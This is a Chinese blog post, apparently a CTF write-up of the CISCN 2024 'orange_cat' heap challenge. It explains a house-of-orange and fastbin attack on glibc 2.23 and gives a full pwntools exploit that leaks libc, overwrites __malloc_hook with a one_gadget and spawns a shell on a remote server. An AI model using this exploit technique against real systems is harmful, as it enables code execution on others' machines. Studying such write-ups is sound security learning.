orange_cat

最新推荐文章于 2024-06-17 17:35:06 发布
最新推荐文章于 2024-06-17 17:35:06 发布
阅读量327 收藏 5
点赞数 4
分类专栏: pwn 文章标签: pwn ctf python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fuiifiuiii/article/details/139075448
版权
ciscn2024-orange_cat

就出了这一道被打成50分的,我真菜狗一只啊

包含输入、修改、输出、删除的堆块题

  1. 输入函数:只限制了堆块的大小,不限制数量

image-20240518162412248

  1. 输出函数和删除函数都只能用一次

  2. edit函数存在7个字节的溢出

    image-20240518165434361

top_chunk 的后三位+size(不包括符号位,符号位要为1),&FFF为0

先用house of orange(这个网上讲的很好)将topchunk置为unsorted bin。

image-20240518165629185

创建一个0x60大小的块,从unsoterd bin中分割出来,再打印这个块,打印出对应的libc地址

image-20240518165748518

将这个块free掉,修改它的fd指针为伪造的fast_chunk,然后用fastbin attack 打malloc_hook。

另:其实不用add那么多次,一次直接改就行,只不过是边打边学的house of orange,刚开始没想明白,后来懒得删上面的了,因为会有些微的地址的差距,懒得再改了。

exp:

from pwn import*
context(log_level='debug',arch='amd64',os='linux')
#p=process('./pwn2')
p=remote('39.106.48.123',35999)
sl = lambda s :p.sendline(s)
sd = lambda s :p.send(s)
rc = lambda s :p.recv(s)
ru = lambda s :p.recvuntil(s)
rl = lambda   :p.recvline()

def debug():
    gdb.attach(p)
    pause(1)

def add(lenth,content):
    ru('Exit')
    sd(b'1')
    ru('length')
    sd(str(lenth))
    rl()
    sd(content)

def edit(lenth,content):
    ru('Exit')
    sd(b'4')
    rl()
    sd(str(lenth))
    rl()
    sd(content)

def dele():
    ru('Exit')
    sd(b'3')

def show():
    ru('Exit')
    sd(b'2')
sl('AAAA')

add(0x1000,b'AAAAA')
add(0x1000,b'BBBB')
add(0x1000,b'BBBB')
add(0x1000,b"BBBB")
add(0x1000,b'AAAAA')
add(0x1000,b'BBBB')
add(0x1000,b'BBBB')
add(0x1000,b"BBBB")
add(0x1000,b'AAAAA')
add(0x1000,b'BBBB')
add(0x1000,b'BBBB')
add(0x1000,b"BBBB")
add(0x1000,b'AAAAA')
add(0x1000,b'BBBB')
add(0x1000,b'BBBB')
add(0x1000,b"BBBB")
add(0x1000,b'AAAAA')
add(0x1000,b'BBBB')
add(0x1000,b'BBBB')
add(0x1000,b"BBBB")
add(0x1000,b'AAAAA')
add(0x1000,b'BBBB')
add(0x1000,b'BBBB')
add(0x1000,b"BBBB")
add(0x1000,b'AAAAA')
add(0x1000,b'BBBB')
add(0x1000,b'BBBB')
add(0x1000,b"BBBB")
add(0x1000,b'AAAAA')
add(0x1000,b'BBBB')
add(0x1000,b'BBBB')
add(0x1000,b"BBBB")
add(0x88,b"bb")

edit(0x8f,b'A'*(0x88)+p32(0xd71))

add(0x1000,b"ABCDEFGHIJKLMN")
#debug()
#show()
add(0x60,b'BB')
#debug()
#pause()
show()
ru('\x7f')
libc = ELF('/home/kali/Desktop/libc-2.23.so')
arena = u64(ru('\x7f')[-6:].ljust(8,b'\x00'))
hook = arena - 0x88 - 3 - 0x600
libc_base = arena -(0x7f96b13c4b78 -0x7f96b1000000  )-0x600
print(hex(arena))
print(hex(libc_base))
one_gadget = libc_base + 0xf03a4
dele()

payload = b'\x00'*19 + p64(one_gadget)

edit(8,p64(hook))

add(0x60,payload)
#debug()
add(0x60,payload)
#debug()

sd(b'1')
rl()
sd(b'80')

p.interactive()
XYYR-c
关注
  • 4
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Orange_'s.一个操作系统的实现.pdf
01-25
Orange_'s.一个操作系统的实现.pdf...全部下下来后,用$cat Orange* >> Orange_'s.一个操作系统的实现.pdf 就可以了。我已验证过。 另外,如果此文件侵犯了您的权益,请发邮件告诉我:jason102sm@gmail.com 我会删除。
Orange_'s.一个操作系统的实现.pdf—ad
01-26
Orange_'s.一个操作系统的实现.pdf...全部下下来后,用$cat Orange* >> Orange_'s.一个操作系统的实现.pdf 就可以了。我已验证过。 另外,如果此文件侵犯了您的权益,请发邮件告诉我:jason102sm@gmail.com 我会删除
【PWN · House_Of_Orange | fastbin-attack】[CISCN 2024 初赛] orange_cat_diary
Mr_Fmnwon的博客
05-19 1121
审计一下题目:经典菜单,edit,show,add,delete俱全嗯,啧啧,delete还有个UAF太明显,爽爽unsortedbin-leak-libc!——what!show只能一次,delete只能一次!!!救命。。。我该怎么做。比较惊险,磨了半天,学习house of orange然后利用,居然真的过了。那一刻的高兴至今难忘。
2024 cicsn orange_cat_diary
llovewuzhengzi的博客
05-30 319
一次free和一次show,可以修改超过创建定义的长度多八个字节,存在edit after free 和show after free。题目提示orange,libc2.23 没有检查得到的fastbin中的chunk的size是否对齐,为0x7f也可以得到其中的chunk。
[CISCN2024]-PWN:orange_cat_diary(glibc2.23.,仅可修改最新堆块,house of orange)
2301_79326813的博客
05-27 247
查看保护查看ida这里我们仅可以修改最新申请出来的堆块,但是有uaf漏洞。
第十七届全国大学生信息安全竞赛创新实践能力赛初赛部分复现
2401_82388450的博客
05-27 1101
1.根据提示信息,均需要从ppt中提取信息2.在ppt的属性中发现一串密文和key,解密之后得到第一部分,根据提示Bifid chipher,为双歧密码解密,使用Bifid Cipher Decode解码3.在第五张幻灯片,发现有一串编码,base64之后得到第六部分4.第三张幻灯片发现base64编码,解码之后得到flag5.在第五张幻灯片的批注下找到base64,解码之后得到第五部分6.在幻灯片的母版中发现加密的内容,并且需要溢出B,b,1,3,解码之后得到第八部分。
第十七届全国大学生信息安全竞赛 CISCN 2024 创新实践能力赛初赛 Web方向 部分题解WP
Jay17的博客
05-19 3479
第十七届全国大学生信息安全竞赛 CISCN 2024 创新实践能力赛初赛 Web方向 部分题解WP
orange pi java_香橙派(OrangePI Zero)入坑(一)
weixin_39835607的博客
02-13 812
干了近20年,第一次写,请见谅。入手的原因,只觉它够小巧,或许可以做点儿server类的东西,所以连扩展板都省了。某宝入手价¥69。。。下载的是ubuntu-server系统。用的是一台十几年前的笔记本,DELL M6300,OS为win7 32,首先安装了SDFormatter(格式化SD卡)【格式化的时候记得:选项设置——逻辑大小调整:ON】然后是:Win32DiskImager.exe,烧录...
模型评估-分类型模型评判指标
weixin_37409506的博客
05-22 189
参考:https://blog.csdn.net/Orange_Spotty_Cat/article/details/80520839 Confusion Matrix 多用于判断分类器优劣 准确率,精确率,召回率,特异度 F1 score F1 Score =2PRP+R \mathrm{F} 1 \text { Score }=\frac{2 \mathrm{P...
orangepi pc GPIO 管脚图
cs9dn003的专栏
03-28 2090
查看 GPIO 管脚 cat /sys/kernel/debug/pinctrl/1c20800.pinctrl/pinmux-pins 1.取得GPIO信息,在终端中敲入以下命令 1 $ cd /sys/class/gpio 2 $ for i in gpiochip* ; do echo `cat $i/label`: `cat $i/base` ; done 终端中显示如下 1 GPIO...
Orange_'s.一个操作系统的实现.pdf—ae
01-26
Orange_'s.一个操作系统的实现.pdf...全部下下来后,用$cat Orange* >> Orange_'s.一个操作系统的实现.pdf 就可以了。我已验证过。 另外,如果此文件侵犯了您的权益,请发邮件告诉我:jason102sm@gmail.com 我会删除
Orange_'s.一个操作系统的实现.pdf—ag
01-26
Orange_'s.一个操作系统的实现.pdf...全部下下来后,用$cat Orange* >> Orange_'s.一个操作系统的实现.pdf就可以了。我已验证过。 另外,如果此文件侵犯了您的权益,请发邮件告诉我:jason102sm@gmail.com 我会删除
Orange_'s.一个操作系统的实现.pdf—ab
01-25
Orange_'s.一个操作系统的实现.pdf...全部下下来后,用$cat Orange* >> Orange_'s.一个操作系统的实现.pdf 就可以了。我已验证过。 另外,如果此文件侵犯了您的权益,请发邮件告诉我:jason102sm@gmail.com 我会删除。
GLM+vLLM 部署调用
qq_38915354的博客
06-13 1113
vLLM 框架是一个高效的大型语言模型(LLM)推理和部署服务系统
使用python库moviepy完成视频剪辑
weixin_42739473的博客
06-17 244
d.修改 moviepy/config_defaults.py 中的IMAGEMAGICK_BINARY的值为本地magic.exe的绝对路径。c.安装moviepy,使用命令 pip install moviepy。,安装完成后设置环境变量。
基于自编码器的心电图信号异常检测(Python)
weixin_39402231的博客
06-17 125
使用的数据集来自PTB心电图数据库,包括14552个心电图记录,包括两类:正常心跳和异常心跳,采样频率为125Hz。
第9章 类
最新发布
我走的每一步都算数
06-17 603
让一个类继承另一个类后,就可以添加区分子类和父类所需的新属性和新方法了。class Car:class ElectricCar(Car): # 继承Carself.battery = 85 # 新属性mycar = ElectricCar(2024, 'Au', 'A7') # 创建实例mycar.prt_battery() # 新方法熟悉Python 提供的选项,这样才能确定哪种组织方式是最佳的,并能理解别人开发的项目。
找出Python潜在的编程问题
svygh123的专栏
06-13 1041
Pylint 是一个非常强大的静态代码分析工具,主要用于检查 Python 代码的语法错误、代码风格问题以及潜在的编程错误。它是 Open Source Initiative 认证的开源软件,由 Logilab 团队开发维护。
根据UML图实现CAT类
07-25
cat = CAT("Tom", 3, "orange") cat.eat() # 输出:Tom is eating. cat.sleep() # 输出:Tom is sleeping. cat.play() # 输出:Tom is playing. ``` 这是一个简单的CAT类的实现,你可以根据自己的需求进行修改和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值